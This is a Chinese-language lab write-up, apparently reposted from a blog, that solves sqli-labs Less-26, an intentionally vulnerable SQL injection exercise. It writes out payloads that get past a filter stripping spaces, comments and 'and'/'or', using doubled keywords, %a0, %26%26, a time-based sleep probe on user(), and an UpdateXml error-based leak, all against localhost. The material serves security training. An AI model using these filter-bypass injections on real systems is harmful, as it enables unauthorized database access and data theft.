码迷,mamicode.com
首页 > 数据库 > 详细

【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)

时间:2018-01-27 23:11:13      阅读:207      评论:0      收藏:0      [点我收藏+]

标签:host   image   语句   weight   识别   pre   comm   inf   XML   

技术分享图片

看了下源码

所有的注释形式和反斜线,and,or都被了过滤掉了

技术分享图片

单引号没有过滤

空格也被过滤了

http://localhost/sqli-labs-master/Less-26/?id=1‘

技术分享图片

http://localhost/sqli-labs-master/Less-26/?id=1‘ ‘

技术分享图片

看了网上的一些方法都是使用了%a0替换掉了空格

http://localhost/sqli-labs-master/Less-26/?id=1‘%a0oorr%a0‘1‘=‘1

但是出了一点问题,似乎无法识别%a0这个字符,有人说是window环境下apache的问题

技术分享图片

可以先放着,因为这个语句是可以正常被执行的

http://localhost/sqli-labs-master/Less-26/?id=1‘oorr‘1‘=‘1
SELECT * FROM users WHERE id=1or1=1 LIMIT 0,1

技术分享图片

利用这一点,可以构造这样的注入

id参数的值不包含注释不包含空格,却可以在正常执行,当user()的第一个字符为‘r‘的时候,延时1s

http://localhost/sqli-labs-master/Less-26/?id=1‘%26%26sleep(ascii(mid(user(),1,1))=114)%26%26‘1‘=‘1
select * from users where id=1&&sleep(ascii(mid(user(),1,1))=114)&&1=1 limit 0,1

技术分享图片

当然出错信息没有被屏蔽也可以用UpdateXml函数直接报错来显示

http://localhost/sqli-labs-master/Less-26/?id=1‘%26%26UpdateXml(1,concat(0x7e,user(),0x7e),1)%26%26‘1‘=‘1

技术分享图片

 

【sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)

标签:host   image   语句   weight   识别   pre   comm   inf   XML   

原文地址:https://www.cnblogs.com/superkrissV/p/8367365.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!